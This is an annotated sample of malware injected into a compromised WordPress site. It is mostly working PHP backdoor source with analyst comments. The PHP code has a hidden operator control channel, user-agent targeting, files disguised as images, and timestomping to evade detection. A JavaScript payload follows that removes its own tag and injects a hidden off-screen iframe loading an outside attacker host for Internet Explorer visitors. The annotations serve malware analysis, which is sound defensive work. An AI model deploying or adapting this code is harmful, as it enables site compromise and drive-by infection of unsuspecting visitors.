Obfuscated PHP code on an exploited WordPress site http://wingho.io/clearing-visitortracker-malware-wordpress-website
// --- Analyst notes (added during review; not part of the original sample) ---
// Top-level request handler of the injected file. Its state lives in two files next to the
// script whose names carry an image extension but hold serialized PHP (settings) and plain
// text (log). The operator interface is keyed only by the fixed parameter name in $pname;
// there is no other authentication.
if(!defined("CUR_PATH")){
define("CUR_PATH",dirname(__FILE__) . DIRECTORY_SEPARATOR);
}
// Serialized settings array; defaults are written by check_exist_all().
if(!defined("SETTINGS_FILE")){
define("SETTINGS_FILE",CUR_PATH."img.jpg");
}
// Plain-text user-agent log, appended to further down.
if(!defined("LOG_FILE")){
define("LOG_FILE",CUR_PATH."dot.jpg");
}
// Only overridable by an including file; in this file it is always false, which makes the
// IS_AJAX header check below dead code.
if(!defined("IS_AJAX")){
define("IS_AJAX",false);
}
// Creates the settings file with everything disabled if it does not exist yet.
check_exist_all();
// Control-channel parameter name. Knowing this string is all that is required to read or
// rewrite the configuration and the log.
$pname = "UEYJHJSDHUEYBSJDHUWYE";
// unserialize() of a file this script writes itself; errors are suppressed, so a missing or
// corrupt file yields false and every later $SETTS[...] read is a notice-producing null.
$SETTS = unserialize(@file_get_contents(SETTINGS_FILE));
// Operator update request: settings arrive either as individual POST fields or as one
// base64-encoded GET blob.
if(
(isset($_POST[$pname]) && !empty($_POST[$pname]) && strlen($_POST[$pname]) >0)
|| (isset($_GET[$pname]) && !empty($_GET[$pname]) && strlen($_GET[$pname]) >0)
){
$new_setts = $SETTS;
$ret = array();
if(isset($_POST[$pname])){
// Field meanings as they are consumed further down: status (== 1 enables delivery),
// u (target URL, stored base64), f ("_#_"-separated user-agent filter list), ct (cookie
// lifetime in seconds), code (base64 JS template), mobile_on / log / debug flags,
// pts (this script's directory relative to the document root, used by detect_doc_root()).
$new_setts["status"] = $_POST[$pname."_status"];
$new_setts["u"] = base64_encode($_POST[$pname."_u"]);
$new_setts["f"] =$_POST[$pname."_f"]; //_#_
$new_setts["ct"] = $_POST[$pname."_ct"];
$new_setts["code"] = $_POST[$pname."_code"];
$new_setts["mobile_on"] = $_POST[$pname."_mobon"];
$new_setts["log"] = $_POST[$pname."_nlog"];
$new_setts["debug"] = $_POST[$pname."_debug"];
$new_setts["pts"] = base64_decode($_POST[$pname."_pts"]);
}else if(isset($_GET[$pname])){
// GET variant: one base64 blob, fields separated by "||__||", same order as the POST
// branch. Missing fields produce undefined-index notices rather than an error.
$data = base64_decode($_GET[$pname]);
$data = explode("||__||",$data);
$new_setts["status"] = $data[0];
$new_setts["u"] = base64_encode($data[1]);
$new_setts["f"] = $data[2]; //_#_
$new_setts["ct"] = $data[3];
$new_setts["code"] = $data[4];
$new_setts["mobile_on"] = $data[5];
$new_setts["log"] = $data[6];
$new_setts["debug"] = $data[7];
$new_setts["pts"] = base64_decode($data[8]);
}else{
exit();
}
// Reports the absolute directory and script path back to the operator.
$server_script_dir = detect_doc_root($new_setts["pts"]).DIRECTORY_SEPARATOR.$new_setts["pts"].DIRECTORY_SEPARATOR;
$ret["pts"] = $server_script_dir;
$ret["script_path"] = $server_script_dir.basename($_SERVER["SCRIPT_NAME"]);
// Persist the new settings; write errors are suppressed.
@file_put_contents(SETTINGS_FILE,serialize($new_setts));
// The stat happens after the write, so the value re-applied by make_touch() is the fresh
// mtime, not the previous one; the visible effect is that the parent directory gets the same
// timestamp as the file. Whether this was meant to preserve the old mtime is unclear.
$touch_exists = false;
if(file_exists(SETTINGS_FILE)){
$ftime = @stat(SETTINGS_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(SETTINGS_FILE,$touch_exists,true);
// Acknowledgement string for the operator side. Note the stray second ";" and the
// unreachable exit() that follows.
echo base64_encode("OKSETTS")."OKSETTSOK_START:".base64_encode(json_encode($ret))."-END";exit();;
exit();
}
// "_test" endpoint: emits the current payload, dumps the whole settings array and the log.
// All of it is disclosed to anyone who knows $pname.
if((isset($_GET[$pname."_test"]) && !empty($_GET[$pname."_test"]) && strlen($_GET[$pname."_test"]) >0)){
show_good_js($SETTS["u"],base64_decode($SETTS["code"]));
echo "\r\n\r\n_______________________\r\n\r\n";
echo base64_encode("OKSETTS");
echo "\r\n\r\n_______________________\r\n\r\n";
var_dump($SETTS);
echo "\r\n\r\n_______________________\r\n\r\n";
if(file_exists(LOG_FILE)){
echo file_get_contents(LOG_FILE);
}else{
echo "No log";
}
exit();
}
// "_shlog" endpoint: dumps only the user-agent log.
if((isset($_GET[$pname."_shlog"]) && !empty($_GET[$pname."_shlog"]) && strlen($_GET[$pname."_shlog"]) >0)){
if(file_exists(LOG_FILE)){
echo file_get_contents(LOG_FILE);
}else{
echo "No log";
}
exit();
}
// Requires a non-standard "Content-Types" request header containing the server name.
// Dead in this file because IS_AJAX is defined as false above.
if(IS_AJAX){
if(!isset($_SERVER["HTTP_CONTENT_TYPES"]) || strpos($_SERVER["HTTP_CONTENT_TYPES"],$_SERVER["SERVER_NAME"])===false){
exit();
}
}
// Visitor targeting: $f decides whether this visitor receives the payload.
// Mobile path: a "mob" query parameter plus the mobile_on setting.
// Desktop path: the user agent is matched against the operator-supplied filter list.
if(isset($_GET["mob"]) && !empty($_GET["mob"]) && strlen($_GET["mob"]) >0 && $SETTS["mobile_on"] == 1){
$f = true;
$is_mob = true;
}else{
$is_mob = false;
$SETTS["f"] = (!empty($SETTS["f"]) && $SETTS["f"] != ""?explode("_#_",$SETTS["f"]):array());//explode("_#_",$SETTS["f"])
$f = false;
// $ua is only assigned on this branch; the logging block below also reads it on the
// mobile path, where it is undefined.
$ua = $_SERVER["HTTP_USER_AGENT"];
if(!empty($SETTS["f"])){
foreach($SETTS["f"] as $one){
/*if(preg_match("|".preg_quote($one).".*?([0-9\.]+)|i", $ua, $match)){
$f = true;
break;
}*/
// Entries containing "*" are dropped into the pattern verbatim (no escaping) between
// "|" delimiters, i.e. the operator supplies a raw regex; other entries are
// preg_quote()d and must be followed by a version-like number.
if(strpos($one,"*")!==false){
if (preg_match("|".$one."|i", $ua, $match)){
$f = true;
break;
}
}else{
if (preg_match("|".preg_quote($one).".*?([0-9\.]+)|i", $ua, $match))
{
$f = true;
break;
}
}
}
}
}
// Debug mode: every visitor matches and the target URL is swapped for a harmless one.
if($SETTS["debug"] == 1){
$f = true;
$SETTS["u"] = base64_encode("http://google.com");
}
// Optional hit logging of the user agent, with the same post-write stat/touch sequence as
// the settings file.
if($f && $SETTS["log"] == 1){
@file_put_contents(LOG_FILE,"[".date("Y-m-d H:i:s")."]: ".$ua."\r\n",FILE_APPEND);
$touch_exists = false;
if(file_exists(LOG_FILE)){
$ftime = @stat(LOG_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(LOG_FILE,$touch_exists,true);
}
// Delivery. Only matched visitors, while status is on and a URL is set, get the real
// payload; a cookie stored under md5("is_uniq") limits that to once per ct seconds
// (ct == 0 disables the limit). Everyone else receives the decoy from show_bad_js().
if($f && $SETTS["status"] == 1 && !empty($SETTS["u"]) && strlen($SETTS["u"])>0){
$check_cook = get_cookie("is_uniq");
if(!$check_cook || $SETTS["ct"] == 0){
set_cookie("is_uniq","1",(time()+$SETTS["ct"]));
if($is_mob){
// Mobile visitors: plain JS redirect to the target URL.
show_js_redirect($SETTS["u"]);
}else{
// Desktop visitors: the operator's JS template with the URL substituted in.
show_good_js($SETTS["u"],base64_decode($SETTS["code"]));
}
}else{
show_bad_js();
}
}else{
show_bad_js();
}
exit();
/**
 * First-run initialisation: if the settings file is missing, writes a serialized array with
 * delivery disabled (status 0, empty URL/filters/code, flags -1). The stat is taken after the
 * write, so make_touch() re-applies the file's fresh mtime to it and its parent directory;
 * the get_some_touch() fallback is only reached when the write failed.
 */
function check_exist_all(){
if(!@file_exists(SETTINGS_FILE)){
@file_put_contents(SETTINGS_FILE,serialize(array("status"=>0,"u"=>"","f"=>"","ct"=>0,"code"=>"","pts"=>"","log"=>-1,"debug"=>-1,"mobile_on"=>-1)));
$touch_exists = false;
if(file_exists(SETTINGS_FILE)){
$ftime = @stat(SETTINGS_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(SETTINGS_FILE,$touch_exists,true);
}
}
/**
 * Decoy response for visitors that are not targeted: a JavaScript content-type and a body that
 * is nothing but a comment holding the current Unix time, presumably so the include looks like
 * an ordinary cache-busted script. No header is sent when IS_AJAX is true.
 */
function show_bad_js(){
if(!IS_AJAX){
header("content-type: application/x-javascript");
}
echo "/*".time()."*/";
}
/**
 * Emits the operator-supplied JavaScript template.
 *
 * @param string $e_url base64-encoded target URL; decoded here.
 * @param string $code  already-decoded JS template; every "{%%EK_URL%%}" token is replaced by
 *                      the decoded URL, without any escaping.
 */
function show_good_js($e_url,$code){
$e_url = base64_decode($e_url);
$code = str_replace(array("{%%EK_URL%%}"),array($e_url),$code);
if(!IS_AJAX){
header("content-type: application/x-javascript");
}
echo $code;
}
/**
 * Mobile delivery: emits JavaScript that navigates the browser to the decoded URL
 * (location.replace() on iPhone/iPod, location assignment otherwise). The URL is spliced
 * into a JS string literal with no escaping. Unlike the other emitters, the header is sent
 * regardless of IS_AJAX.
 *
 * @param string $e_url base64-encoded target URL.
 */
function show_js_redirect($e_url){
$e_url = base64_decode($e_url);
header("content-type: application/x-javascript");
$redirect = "if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {location.replace('".$e_url."');}else{window.location = '".$e_url."';document.location = '".$e_url."';}";
echo $redirect;
}
/**
 * Derives the document root from this file's real directory by stripping the
 * operator-supplied relative path ("pts") off its end. Doubled slashes are collapsed and a
 * leading "/" removed first. If the supplied path does not actually occur in the real
 * directory, str_replace() changes nothing and the script's own directory is returned.
 *
 * @param string $path_to_script directory of this script relative to the document root.
 * @return string
 */
function detect_doc_root($path_to_script){
$path_to_script = str_replace("//","/",$path_to_script);
if(substr($path_to_script,0,1) == "/"){
$path_to_script = substr_replace($path_to_script, "", 0,1);
}
$full_path = realpath(dirname(__FILE__));
if($path_to_script == ""){
$doc_root = $full_path;
}else{
$doc_root = str_replace(DIRECTORY_SEPARATOR.$path_to_script,"",$full_path);
}
return $doc_root;
}
/**
 * Builds a string of random ASCII letters (both cases). Not called anywhere in this file.
 * Note the loop runs from $min to $max inclusive, so the result has $max - $min + 1
 * characters rather than a random length between the two bounds.
 *
 * @param int      $min lower bound; also used to derive $max when that is missing or too small.
 * @param int|bool $max upper bound; false or <= $min becomes 2 * $min.
 * @return string
 */
function rand_string($min = 2,$max = false){
$abc = "qwertyuiopasdfghjklzxcvbnm";
$abc_up = strtoupper($abc);
$abc = str_split($abc);
$abc_up = str_split($abc_up);
$abc = array_merge($abc,$abc_up);
$return = array();
if(!$max || $max <= $min){
$max = $min + $min;
}
for($i =$min; $i <= $max; $i++){
$return[] = $abc[array_rand($abc)];
}
return implode("",$return);
}
/**
 * Sets a cookie whose name is md5($name), so the stored name does not reveal its purpose.
 * httponly is true, secure is false, domain empty. The default $expire of 1 (epoch second 1)
 * would expire immediately; the only caller in this file passes time() + ct.
 *
 * @return bool result of setcookie().
 */
function set_cookie($name = "", $value = "", $expire = 1, $path = "/"){
return setcookie(md5($name),$value,$expire,$path,"",false,true);
}
/**
 * Reads the cookie stored under md5($name) (see set_cookie()).
 *
 * @return string|bool the cookie value, or false when absent or empty.
 */
function get_cookie($name = ""){
if(isset($_COOKIE[md5($name)]) && !empty($_COOKIE[md5($name)])){
return $_COOKIE[md5($name)];
}else{
return false;
}
}
/**
 * Sets the modification time of $fpath (and optionally its parent directory) to a chosen
 * value. All touch() errors are suppressed.
 *
 * @param string   $fpath         file to stamp.
 * @param int|bool $touch_exist   mtime to apply; when false, get_some_touch() picks one
 *                                from the neighbouring files instead.
 * @param bool     $touch_par_dir when exactly true, the parent directory is stamped with the
 *                                same value.
 */
function make_touch($fpath,$touch_exist = false,$touch_par_dir = false){
$ttime = 0;
if($touch_exist){
$ttime = $touch_exist;
}else{
$ttime = get_some_touch($fpath);
}
@touch($fpath,$ttime);
if($touch_par_dir===true){
// Parent directory = path with its last separator-delimited component removed.
$fpath = explode(DIRECTORY_SEPARATOR,$fpath);
array_splice($fpath, (count($fpath)-1), 1);
$fpath= implode(DIRECTORY_SEPARATOR,$fpath);
if(substr($fpath, -1) != DIRECTORY_SEPARATOR)
$fpath= $fpath.DIRECTORY_SEPARATOR;
@touch($fpath,$ttime);
}
}
/**
 * Picks a plausible "old" timestamp for a file: the smallest mtime among all other entries in
 * the file's parent directory, or roughly one year ago (360 days) when the directory is empty
 * or the smallest value is not positive. Used by make_touch() when no mtime was supplied,
 * presumably so that files created by this script do not stand out as recent.
 *
 * @param string $fpath path of the file whose siblings are inspected.
 * @return int Unix timestamp.
 */
function get_some_touch($fpath){
$fpath = explode(DIRECTORY_SEPARATOR,$fpath);
array_splice($fpath, (count($fpath)-1), 1);
$fpath= implode(DIRECTORY_SEPARATOR,$fpath);
if(substr($fpath, -1) != DIRECTORY_SEPARATOR)
$fpath= $fpath.DIRECTORY_SEPARATOR;
$dirs = array_diff(scandir($fpath),array(".",".."));
$touches = array();
foreach($dirs as $one){
$stat = stat($fpath.$one);
$touches[] = $stat['mtime'];
}
//asort($touches);
// Ascending numeric sort, so index 0 is the oldest entry.
sort($touches, SORT_NUMERIC);
if(isset($touches[0]) and !empty($touches) and $touches[0]>0)
return $touches[0];
else
return (time() - (3600*24*30 * 12));
}
<script type="text/javascript" id="id_2649819">
// Self-removal: looks up the <script> element this payload was injected as (the id matches
// the element's id attribute above) and blanks its outerHTML, so the injected script no
// longer appears in the live DOM after it has run. The "none" comparison is a build-time
// switch that is never taken here.
function lNvpGvHOLiehBHBMLYbvPlJrpgWOsYuTZmucBDLtR() {
var e = "id_2649819";
if ("none" != e) {
var i = document.getElementById(e);
void 0 != typeof i && null != i && (i.outerHTML = "", delete i)
}
}
// Internet Explorer detection. Every branch guarded by document.all returns true, so the
// chain reduces to: document.all exists, OR navigator.maxTouchPoints is defined and the
// user agent parses as IE/Edge (see the version parser below). The intermediate feature
// tests (compatMode, XMLHttpRequest, querySelector, ...) never change the outcome.
function gKQltxDpZWJOZHmDbcAsNLSXWNYdgxHFYU() {
return document.all && !document.compatMode ? !0 : document.all && !window.XMLHttpRequest ? !0 : document.all && !document.querySelector ? !0 : document.all && !document.addEventListener ? !0 : document.all && !window.atob ? !0 : document.all ? !0 : "undefined" != typeof navigator.maxTouchPoints && !document.all && iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() ? !0 : !1
}
// Parses the IE/Edge major version out of the user agent: the number after "MSIE ", after
// "rv:" when a "Trident/" token is present, or after "Edge/". Returns false when none of the
// three tokens is found. Callers use the truthiness only, so a parsed "0" would count as
// not-IE.
function iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() {
var e = window.navigator.userAgent,
i = e.indexOf("MSIE ");
if (i > 0) return parseInt(e.substring(i + 5, e.indexOf(".", i)), 10);
var t = e.indexOf("Trident/");
if (t > 0) {
var n = e.indexOf("rv:");
return parseInt(e.substring(n + 3, e.indexOf(".", n)), 10)
}
var o = e.indexOf("Edge/");
return o > 0 ? parseInt(e.substring(o + 5, e.indexOf(".", o)), 10) : !1
}
// Mobile-device test on the lower-cased user agent: one alternation is matched against the
// whole string, a second (four-letter vendor/model prefixes) against its first four
// characters. The pattern resembles the widely circulated "detectmobilebrowsers" list and
// was presumably copied from it (not verified here).
function BvYpXdZglDLRdNvGFNxeifOmYPRQhQg() {
var e = window.navigator.userAgent.toLowerCase();
return /(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(e) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(e.substr(0, 4)) ? !0 : !1
}
// Entry point of the injected script. Polls every 100 ms until document.body exists, then
// runs exactly once per page (guarded by the window.v_... flag) and finally removes its own
// <script> element.
var NSwtIQNTEWGEUlrSDDgdDjIKZwWnWSHsHxyn = setInterval(function() {
if (null != document.body && "undefined" != typeof document.body) {
if (clearInterval(NSwtIQNTEWGEUlrSDDgdDjIKZwWnWSHsHxyn), "undefined" == typeof window.v_35763a2628ec5f7420be3779607dfe04) {
window.v_35763a2628ec5f7420be3779607dfe04 = 1;
// e: browser parses as IE (version token present AND document.all / maxTouchPoints test).
// i: Chrome, by window.chrome plus the vendor string.
// t: hard-coded -1, which disables the mobile-redirect branch below.
// n: the hard-coded landing URL (an indicator worth blocking/alerting on).
var e = iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() && gKQltxDpZWJOZHmDbcAsNLSXWNYdgxHFYU(),
i = !e && !!window.chrome && "Google Inc." === window.navigator.vendor,
t = -1,
n = "http://zxcgheytergfdgdfg.cf/052F";
// Dead branch: requires t == 1. Would redirect mobile visitors to n.
if (BvYpXdZglDLRdNvGFNxeifOmYPRQhQg() && 1 == t) navigator.userAgent.match(/iPhone/i) || navigator.userAgent.match(/iPod/i) ? location.replace(n) : (window.location = n, document.location = n);
// Live branch: IE only, not Chrome, not mobile. Appends a 10x10 iframe loading n inside a
// div positioned far off-screen, either onto the body (no divs in the page) or into the
// middle div of the document. innerHTML concatenation re-parses that container's content.
else if (e && !i && !BvYpXdZglDLRdNvGFNxeifOmYPRQhQg()) {
var o = '<div style="position:absolute;left:-3532px;"><iframe width="10px" src="' + n + '" height="10px"></iframe></div>',
a = document.getElementsByTagName("div");
if (0 == a.length) document.body.innerHTML = document.body.innerHTML + o;
else {
var d = a.length,
r = Math.floor(d / 2);
a[r].innerHTML = a[r].innerHTML + o
}
}
}
// Remove the injecting <script> element from the DOM regardless of which branch ran.
lNvpGvHOLiehBHBMLYbvPlJrpgWOsYuTZmucBDLtR()
}
}, 100);
</script>